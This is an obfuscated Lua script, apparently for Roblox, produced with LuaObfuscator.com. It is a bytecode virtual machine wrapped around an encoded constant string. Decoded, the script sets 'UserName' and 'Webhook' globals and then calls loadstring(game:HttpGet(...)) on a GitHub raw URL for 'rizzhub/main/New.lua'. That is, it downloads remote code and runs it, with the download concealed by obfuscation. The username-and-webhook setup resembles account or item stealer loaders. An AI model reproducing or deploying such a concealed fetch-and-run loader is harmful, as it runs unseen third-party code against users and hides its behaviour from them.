--[[

 .____                  ________ ___.    _____                           __                

 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 

 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \

 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/

 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   

         \/          \/         \/    \/                \/     \/     \/                   

          \_Welcome to LuaObfuscator.com   (Alpha 0.2.5) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v20)if (v1(v20,2)==79) then local v72=0;while true do if (v72==0) then v19=v0(v3(v20,1,1));return "";end end else local v73=v2(v0(v20,16));if v19 then local v92=v5(v73,v19);v19=nil;return v92;else return v73;end end end);local function v21(v22,v23,v24)if v24 then local v74=(v22/((116 -(95 + 19))^(v23-(1 + (0 -0)))))%(2^(((v24-(1450 -(777 + 672))) -(v23-(1 + (816 -(241 + 575))))) + 1 + 0)) ;return v74-(v74%1) ;else local v75=(2 -0)^(v23-(1 + 0)) ;return (((v22%(v75 + v75))>=v75) and (982 -(130 + 851))) or (0 -0) ;end end local function v25()local v38=0 + (0 -0) ;local v39;while true do if (v38==0) then v39=v1(v16,v18,v18);v18=v18 + 1 + 0 ;v38=1094 -(38 + 1055) ;end if (v38==(3 -2)) then return v39;end end end local function v26()local v40=1127 -((673 -198) + (952 -(207 + 93))) ;local v41;local v42;while true do if (v40==(1 + 0)) then return (v42 * (419 -(68 + 95))) + v41 ;end if (v40==(0 + 0)) then v41,v42=v1(v16,v18,v18 + 2 );v18=v18 + 2 + 0 ;v40=1078 -(862 + 215) ;end end end local function v27()local v43,v44,v45,v46=v1(v16,v18,v18 + (11 -8) );v18=v18 + 4 + 0 ;return (v46 * (50928537 -34151321)) + (v45 * 65536) + (v44 * (787 -531)) + v43 ;end local function v28()local v47=v27();local v48=v27();local v49=1555 -(31 + 1151 + 372) ;local v50=(v21(v48,1347 -(1095 + (828 -(64 + 513))) ,(188 -121) -47 ) * ((2 + 0)^32)) + v47 ;local v51=v21(v48,21,30 + 1 );local v52=((v21(v48,65 -33 )==(1215 -(587 + 627))) and  -((3 + 0) -2)) or (1 + 0) ;if (v51==(1911 -(300 + 1611))) then if (v50==(1847 -(1815 + 32))) then return v52 * (0 + 0) ;else local v93=0 + 0 ;while true do if (v93==(0 + 0)) then v51=1;v49=0 + 0 ;break;end end end elseif (v51==(3898 -(1450 + 401))) then return ((v50==(0 -(0 -0))) and (v52 * ((1 + 0)/(0 -0)))) or (v52 * NaN) ;end return v8(v52,v51-(3189 -2166) ) * (v49 + (v50/((1317 -(572 + 743))^(199 -147)))) ;end local function v29(v30)local v53=0 -0 ;local v54;local v55;while true do if (v53==((1240 -(1169 + 70)) + 0)) then v54=v3(v16,v18,(v18 + v30) -(2 -1) );v18=v18 + v30 ;v53=1 + 1 ;end if (v53==((6 -3) -1)) then v55={};for v94=1 + 0 , #v54 do v55[v94]=v2(v1(v3(v54,v94,v94)));end v53=416 -(99 + 202 + 112) ;end if (v53==(93 -(55 + 38))) then v54=nil;if  not v30 then v30=v27();if (v30==(0 + 0)) then return "";end end v53=3 -2 ;end if (v53==(8 -5)) then return v6(v55);end end end local v31=v27;local function v32(...)return {...},v12("#",...);end local function v33()local v56=0;local v57;local v58;local v59;local v60;local v61;local v62;local v63;while true do if (v56==(1 + 0)) then v59=nil;v60=nil;v56=8 -6 ;end if (v56~=0) then else v57=0 -0 ;v58=nil;v56=1 + 0 ;end if (v56==(1 + 2)) then v63=nil;while true do local v96=0 + 0 ;local v97;while true do if (v96~=0) then else v97=0;while true do if ((1 + 0)~=v97) then else if (v57~=(2 -1)) then else v61={v58,v59,nil,v60};v62=v27();v63={};v57=4 -2 ;end if (v57~=(881 -(75 + 804))) then else for v105=1,v62 do local v106=0;local v107;local v108;while true do if (v106~=(0 -0)) then else v107=v25();v108=nil;v106=1 -0 ;end if (v106~=(1 + 0)) then else if (v107==(1 + 0)) then v108=v25()~=(0 + 0) ;elseif (v107==(539 -(19 + 518))) then v108=v28();elseif (v107~=3) then else v108=v29();end v63[v105]=v108;break;end end end v61[4 -1 ]=v25();for v109=1 -0 ,v27() do local v110=0 + 0 ;local v111;local v112;local v113;while true do if (v110~=(1591 -(1452 + 139))) then else v111=0 -0 ;v112=nil;v110=1;end if (1~=v110) then else v113=nil;while true do if (v111==(1193 -(1015 + 177))) then while true do if (v112~=0) then else v113=v25();if (v21(v113,1 + 0 ,748 -(411 + 336) )~=(1552 -(155 + 1397))) then else local v146=271 -(65 + 206) ;local v147;local v148;local v149;local v150;while true do if (v146==(2 + 0)) then while true do if (v147~=2) then else local v174=1832 -(1373 + 459) ;local v175;while true do if (v174==(1954 -(212 + 1742))) then v175=0 -0 ;while true do if (1==v175) then v147=6 -3 ;break;end if (v175~=0) then else if (v21(v149,1 + 0 ,2 -1 )~=1) then else v150[2]=v63[v150[2]];end if (v21(v149,186 -(178 + 6) ,2 + 0 )==(2 -1)) then v150[1061 -(1033 + 25) ]=v63[v150[398 -(374 + 21) ]];end v175=1484 -(490 + 993) ;end end break;end end end if (v147==(365 -(198 + 167))) then local v176=1618 -(241 + 1377) ;local v177;while true do if (v176~=(0 -0)) then else v177=1850 -(126 + 1724) ;while true do if (v177==(39 -(18 + 21))) then v148=v21(v113,4 -2 ,3);v149=v21(v113,4,14 -8 );v177=1 + 0 ;end if (v177~=(1 + 0)) then else v147=1543 -(1487 + 55) ;break;end end break;end end end if (v147~=(1 + 0)) then else local v178=0 -0 ;while true do if (v178==(3 -2)) then v147=1314 -(986 + 326) ;break;end if (v178==(0 + 0)) then local v183=0 -0 ;while true do if (v183~=(796 -(591 + 205))) then else v150={v26(),v26(),nil,nil};if (v148==(0 -0)) then local v193=0 + 0 ;local v194;while true do if (v193~=(75 -(43 + 32))) then else v194=193 -(113 + 80) ;while true do if (v194==(0 -0)) then v150[3]=v26();v150[4]=v26();break;end end break;end end elseif (v148==1) then v150[7 -4 ]=v27();elseif (v148==2) then v150[3]=v27() -((2 + 0)^(1563 -(103 + 1444))) ;elseif (v148==3) then local v199=1423 -(664 + 759) ;local v200;while true do if (v199~=(0 + 0)) then else v200=0;while true do if (v200~=(0 -0)) then else v150[2 + 1 ]=v27() -((1 + 1)^(6 + 10)) ;v150[4]=v26();break;end end break;end end end v183=1698 -(1210 + 487) ;end if ((90 -(57 + 32))==v183) then v178=1;break;end end end end end if (v147==(3 -0)) then if (v21(v149,1510 -(5 + 1502) ,5 -2 )==(2 -1)) then v150[4]=v63[v150[4]];end v58[v109]=v150;break;end end break;end if (v146==(0 + 0)) then local v165=0;while true do if (v165~=0) then else v147=0;v148=nil;v165=1 + 0 ;end if (v165~=1) then else v146=2 -1 ;break;end end end if (v146==(1 -0)) then local v166=0;local v167;while true do if (v166~=(1579 -(691 + 888))) then else v167=0 -0 ;while true do if (v167~=0) then else local v184=1396 -(32 + 1364) ;while true do if (v184~=(3 -2)) then else v167=1 + 0 ;break;end if (v184==(1422 -(99 + 1323))) then v149=nil;v150=nil;v184=287 -(29 + 257) ;end end end if (v167~=(1 + 0)) then else v146=2;break;end end break;end end end end end break;end end break;end if (v111==(681 -(44 + 637))) then local v133=0;local v134;while true do if (v133==(1900 -(1715 + 185))) then v134=1847 -(1674 + 173) ;while true do if (v134==(0 -0)) then local v155=1851 -(1284 + 567) ;while true do if (v155~=(0 + 0)) then else v112=142 -(28 + 114) ;v113=nil;v155=1;end if (v155==(2 -1)) then v134=1 -0 ;break;end end end if (v134~=(777 -(743 + 33))) then else v111=1 + 0 ;break;end end break;end end end end break;end end end v57=3;end break;end if (v97==(0 + 0)) then local v102=374 -(244 + 130) ;while true do if (v102~=0) then else if ((6 -3)==v57) then local v114=0;while true do local v119=0;while true do if (v119~=(0 -0)) then else if (v114==(1 + 0)) then return v61;end if (v114==0) then local v143=0 -0 ;while true do if (v143==(1 + 0)) then v114=1;break;end if (v143~=(0 -0)) then else for v156=1 + 0 ,v27() do v59[v156-1 ]=v33();end for v158=1,v27() do v60[v158]=v27();end v143=1;end end end break;end end end end if (v57==(0 -0)) then local v115=203 -(12 + 191) ;while true do if (v115~=(149 -(87 + 62))) then else v58={};v59={};v115=1;end if (v115==(1 + 0)) then v60={};v57=1;break;end end end v102=1 + 0 ;end if (v102==(1 + 0)) then v97=1 + 0 ;break;end end end end break;end end end break;end if (2==v56) then v61=nil;v62=nil;v56=11 -8 ;end end end local function v34(v35,v36,v37)local v64=v35[1];local v65=v35[2];local v66=v35[3];return function(...)local v67=1;local v68= -1;local v69={...};local v70=v12("#",...) -1 ;local function v71()local v76=v64;local v77=v65;local v78=v66;local v79=v32;local v80={};local v81={};local v82={};for v86=0 -0 ,v70 do if (((83 + 2480)<(11405 -(8656 -(570 + 541)))) and (v86>=v78)) then v80[v86-v78 ]=v69[v86 + (976 -(189 + 786)) ];else v82[v86]=v69[v86 + (1670 -(122 + 1547)) ];end end local v83=(v70-v78) + (720 -(11 + 708)) ;local v84;local v85;while true do local v87=144 -(69 + 75) ;local v88;local v89;while true do if (((156 + 2531)==(3565 -((761 -(331 + 425)) + 873))) and ((1 + 0)==v87)) then while true do if (((473 -299)<2596) and (v88==(0 -0))) then v89=0 + 0 ;while true do if (((2267 -1344)<=(3741 -2650)) and ((1 + 0)==v89)) then if ((v85<=(1210 -(540 + 666))) or ((13186 -8526)<(84 + 56))) then if ((v85<=(1 + 0)) or ((784 + 17)==(6631 -((2726 -(1719 + 99)) + 820)))) then if ((v85>((1629 -(159 + 1313)) -(23 + 134))) or ((17163 -12650)<=(142 + (1722 -(13 + 1181))))) then v82[v84[1722 -(1527 + 193) ]]=v84[3 -0 ];else local v122=340 -(309 + 31) ;local v123;local v124;local v125;local v126;local v127;local v128;while true do if (((5114 -3385)>(620 -(27 + 6))) and (v122==(924 -(381 + 543)))) then v123=0 + 0 ;v124=nil;v122=2 -1 ;end if (((4595 -(475 + 1479))<=((4390 -(123 + 366)) -(77 + 500))) and ((191 -(131 + 59))==v122)) then v125=nil;v126=nil;v122=2 + 0 ;end if ((v122==(1 + 2)) or ((7311 -5325)>=(8829 -4840))) then while true do if (((6243 -3019)<=(4743 -(313 + 292 + 86))) and ((5 -3)==v123)) then v128=nil;while true do if ((((1616 -526) + 1649)>(1040 -(780 + 49 + 192))) and (v124==0)) then local v168=590 -(566 + 24) ;local v169;while true do if (((2346 -(472 + 765))<(1441 + 637)) and (v168==((57 -(22 + 35)) + 0))) then v169=290 -(68 + 222) ;while true do if (((1719 + (2435 -(458 + 1243)))>=(289 -(531 -352))) and (v169==(141 -(127 + 13)))) then v124=(2970 -(48 + 1083)) -(356 + 1482) ;break;end if (((21 + 3206)<(12901 -8723)) and (v169==(0 -(0 -0)))) then local v185=0 + 0 ;while true do if ((v185==(454 -(10 + 46 + 398))) or ((2194 -1595)>=(5792 -3769))) then v125=v84[1373 -(687 + 684) ];v126,v127=v79(v82[v125](v13(v82,v125 + (2 -1) ,v84[112 -(77 + 32) ])));v185=1 + 0 ;end if ((v185==(1 + 0)) or ((4011 -961)<=(64 + (3726 -2932)))) then v169=1 -0 ;break;end end end end break;end end end if (((3 -1)==v124) or ((2547 + 349)<((2851 -(810 + 425)) -881))) then for v171=v125,v68 do local v172=0;local v173;while true do if (((4325 -3409)==(2814 -1898)) and (v172==(1989 -(171 + 1818)))) then v173=0 + 0 ;while true do if (((5774 -3578)==((3470 + 1955) -3229)) and (v173==(245 -(108 + 137)))) then v128=v128 + (348 -(115 + 232)) ;v82[v171]=v126[v128];break;end end break;end end end break;end if (((311 + 55)<=((13154 -8100) -(442 + 598))) and (v124==(1508 -(262 + 1245)))) then local v170=0 + 0 ;while true do if (((2374 -(582 + 520))<(184 + 1728)) and (v170==1)) then v124=1 + 1 + 0 ;break;end if ((v170==(0 + 0)) or ((2834 -1221)>=3111)) then local v180=0 -0 ;while true do if (((2492 -(818 + 294))==(1798 -(207 + 211))) and (v180==(1842 -(41 + 1800)))) then v170=1 + 0 ;break;end if (((2458 -927)<((5019 -(785 + 798)) -(1435 + 172))) and (v180==(0 -(1878 -(1682 + 196))))) then v68=(v127 + v125) -(1 -0) ;v128=(1147 -(703 + 444)) + 0 ;v180=1711 -(830 + 880) ;end end end end end end break;end if (((10146 -5630)>=(2595 -(390 + 376))) and (v123==(1 + 0))) then local v151=0;while true do if (((369 + 368)<=(3945 -(1455 + 154))) and (v151==1)) then v123=8 -6 ;break;end if ((v151==(0 -0)) or ((4117 -(226 + 93))<=(5289 -(1553 + 96)))) then v126=nil;v127=nil;v151=1 + 0 ;end end end if ((v123==(0 + 0 + 0)) or ((311 + 4)<=(572 -393))) then local v152=0 -0 ;while true do if ((v152==(1 + 0)) or ((2269 -1716)>(4526 -(197 + 188)))) then v123=1 + 0 ;break;end if ((v152==(0 -0)) or (((1744 -(166 + 182)) + 3028)<(13113 -10180))) then v124=(0 -0) -0 ;v125=nil;v152=622 -(135 + 486) ;end end end end break;end if (((3 -1)==v122) or ((5289 -1932)<=(3469 -(384 + 90)))) then v127=nil;v128=nil;v122=8 -(10 -5) ;end end end elseif ((v85<=(4 -2)) or ((11829 -7055)<(629 + 2782))) then v67=v84[841 -(252 + 586) ];elseif ((v85==(7 -4)) or ((10434 -7359)<(4616 -2789))) then if ((v82[v84[1 + 1 + 0 ]]==v84[4 + 0 + 0 ]) or ((8322 -5972)>(13652 -10130))) then v67=v67 + (3 -2) ;else v67=v84[1317 -(710 + 604) ];end else local v135=0 + 0 ;local v136;local v137;local v138;while true do if ((((1391 -960) -110)<=(270 + 3002)) and (v135==(395 -((226 -94) + 263)))) then v136=0 + 0 ;v137=nil;v135=2 -1 ;end if ((3267>=((2829 -1598) -(397 + 117))) and (v135==(1 + 0))) then v138=nil;while true do if (((17340 -12773)>=(1244 + 477 + 2817)) and (v136==0)) then v137=v84[2 + 0 ];v138=v82[v84[514 -(25 + 453 + 33) ]];v136=1 + 0 ;end if (((4845 -(247 + 85))>(1806 + 256)) and ((1 + 0)==v136)) then v82[v137 + (2 -1) ]=v138;v82[v137]=v138[v84[12 -8 ]];break;end end break;end end end elseif ((v85<=(5 + 2)) or ((2469 + 2465)<=(4308 -1864))) then if (((51 + 708)==(1409 -(50 + 600))) and (v85<=((5463 -4152) -(112 + 1194)))) then do return;end elseif ((v85==((4 + 3) -1)) or ((6370 -3895)>=(1832 + 2068))) then if (((3050 -((668 -(38 + 85)) + 1252))==(309 + 944)) and (v84[(704 -(43 + 33)) -(191 + 435) ]==v82[v84[2 + 2 ]])) then v67=v67 + (1 -0) ;else v67=v84[827 -(58 + (1809 -1043)) ];end else v82[v84[2 + 0 ]]=v37[v84[9 -6 ]];end elseif ((v85<=8) or ((314 + 1056)<(1674 -(341 + 1014)))) then local v130=393 -(216 + (487 -310)) ;local v131;local v132;while true do if ((v130==(1654 -(155 + 1498))) or ((5344 -3305)<=(1967 -923))) then while true do if (((5185 -(5696 -4264))>=(2388 -(894 + 636))) and (v131==(0 + 0))) then v132=v84[2 + 0 ];v82[v132]=v82[v132](v13(v82,v132 + (4 -3) ,v68));break;end end break;end if (((4868 -(139 + 311))>=((6023 -(54 + 82)) -(871 + 1095))) and ((0 + 0)==v130)) then v131=0 -0 ;v132=nil;v130=711 -(609 + 101) ;end end elseif ((((7947 -(890 + 563)) -3070)<=(14650 -10425)) and (v85==(1594 -((2882 -1466) + 169)))) then v37[v84[4 -1 ]]=v82[v84[1578 -(270 + 1306) ]];else v82[v84[1 + 1 ]]();end v67=v67 + (3 -2) ;break;end if ((v89==(1852 -(1114 + 738))) or ((2089 + 819)>=(2891 + 1041))) then local v104=0 -0 ;while true do if (((4 + 2)<=(5399 -(167 + 788))) and ((202 -(38 + 164))==v104)) then v84=v76[v67];v85=v84[(826 + 283) -(106 + 1002) ];v104=1 -0 ;end if (((43 -24)<=(14995 -11174)) and ((1 + 0)==v104)) then v89=2 -1 ;break;end end end end break;end end break;end if (((1311 -(524 + 652))<=(3378 -(458 + 1537))) and (v87==(400 -((970 -(133 + 510)) + 73)))) then v88=0 + 0 ;v89=nil;v87=1464 -(260 + (4069 -2866)) ;end end end end A,B=v32(v11(v71));if  not A[1] then local v90=0;local v91;while true do if (v90==0) then v91=v35[4][v67] or "?" ;error("Script error at ["   .. v91   .. "]:"   .. A[2] );break;end end else return v13(A,2,B);end end;end return v34(v33(),{},v17)(...);end v15("LOL!0A3O00028O0003083O00557365724E616D6503073O004F4E45545F543603073O00576562682O6F6B034O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574033C3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F6B34662O742F72692O7A6875622F6D61696E2F4E65772E6C756100143O0012013O00013O000E060001000800013O0004023O00080001001201000100033O001209000100023O001201000100053O001209000100043O0012013O00063O0026033O0001000100060004023O00010001001207000100073O001207000200083O0020040002000200090012010004000A6O000200044O000800013O00022O000A0001000100010004023O001300010004023O000100012O00053O00017O00143O00023O00043O00043O00053O00053O00063O00063O00073O00093O00093O000A3O000A3O000A3O000A3O000A3O000A3O000A3O000B3O000C3O000E3O00",v9(),...);end
